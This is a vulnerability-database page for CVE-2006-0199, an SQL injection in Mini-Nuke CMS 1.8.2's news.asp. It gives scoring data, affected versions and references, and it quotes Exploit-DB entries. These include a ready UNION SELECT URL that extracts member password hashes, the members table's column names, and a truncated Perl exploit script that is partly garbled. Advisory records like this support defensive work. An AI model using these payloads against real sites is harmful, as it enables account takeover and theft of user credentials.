CVE-2006-0199
Published 2006-01-13
Priority: P341, high, CVSS 2.0 score 7.5
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 1.80% (75.8th percentile)
SQL injection vulnerability in news.asp in Mini-Nuke CMS System 1.8.2 and earlier allows remote attackers to execute arbitrary SQL commands via the hid parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mini-nuke | cms_system | <= 1.8.2 | — |
No detection rules found.
Exploit-DB
MiniNuke 1.8.2 - Multiple SQL Injections
exploitdb·2006-01-14
---
Contacts:{
ICQ: 10072
MSN/Email: [email protected]
Web: http://www.nukedx.com
}
---
Vendor: MiniNuke (www.miniex.net)
Version: 1.8.2 and prior versions must be affected.
About: Via this method a remote attacker can inject an SQL query into news.asp
---
How&Example: GET -> http://[site]/news.asp?Action=Print&hid=[SQLQuery]
http://www.miniex.net/news.asp?Action=Print&hid=66%20union+select+0,sifre,0,0,0,0,0,0,0,0+from+members+where+uye_id=52
Columns of MEMBERS:
uye_id = userid
sifre = md5 password hash
g_soru = secret question.
g_cevap = secret answer
email = mail address
isim = name
icq = ICQ Uin
msn = MSN Sn.
aim = AIM Sn.
meslek = job
cinsiyet = gender
yas = age
url = url
imza = signature
mail_goster = show mail :P
avurl = avatar url
avatar = a
Exploit-DB
MiniNuke 1.8.2 - 'hid' SQL Injection
exploitdb·2006-01-14
---
#!/usr/bin/perl
# MiniNuke (www.miniex.net) Version: new( Proto => "tcp",
PeerAddr => $proxyAddr?"$proxyAddr":"$serv",
PeerPort => $proxyPort?"$proxyPort":"80")
|| die "can't connect to: $serv\n";
print $socket "GET $request HTTP/1.1\n";
print $socket "Host: $serv\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "+ Connected!...\n";
while($answer = ) {
if ($answer =~ /([\d,a-f]{32})/) {
print "+ Found! The hash for user $uid: $1\n";
print "----------------------------------\n";
exit(); }
if ($answer =~ /number of columns/) { print "+ Vulnerable! But no result with default querry, so manually change the scrypt;-)...\n";exit(); }
}
print "Exploit failed\n";
print "--------------------------\n";
# milw0rm.com [2006-01
No writeups or analysis indexed.
References:
http://archives.neohapsis.com/archives/fulldisclosure/2006-01/0439.html
http://secunia.com/advisories/18439
http://securityreason.com/securityalert/340
http://www.nukedx.com/?viewdoc=7
http://www.osvdb.org/22384
http://www.securityfocus.com/archive/1/421727/100/0/threaded
http://www.vupen.com/english/advisories/2006/0173
https://exchange.xforce.ibmcloud.com/vulnerabilities/24098